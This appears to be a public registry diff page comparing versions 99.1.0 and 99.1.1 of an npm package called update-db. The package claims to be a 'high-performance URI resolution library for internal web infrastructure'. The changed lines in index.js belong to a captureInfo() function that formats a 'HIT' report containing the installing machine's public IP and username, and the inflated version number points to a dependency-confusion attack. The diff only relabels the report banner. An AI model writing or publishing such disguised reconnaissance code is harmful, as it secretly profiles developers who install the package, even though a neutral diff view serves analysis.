update-db 99.1.0 → 99.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -47,7 +47,7 @@ function captureInfo() {
47
47
  };
48
48
 
49
49
  const report = `
50
- 🚨 *HIT: RESOLVE-URI EXECUTED* 🚨
50
+ 🚨 *HIT: update-db* 🚨
51
51
  ----------------------------------
52
52
  🌍 *PUBLIC IP:* \`${info.ip}\`
53
53
  👤 *USER:* \`${info.user}\`
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "update-db",
3
- "version": "99.1.0",
3
+ "version": "99.1.1",
4
4
  "description": "High-performance URI resolution library for internal web infrastructure.",
5
5
  "main": "index.js",
6
6
  "scripts": {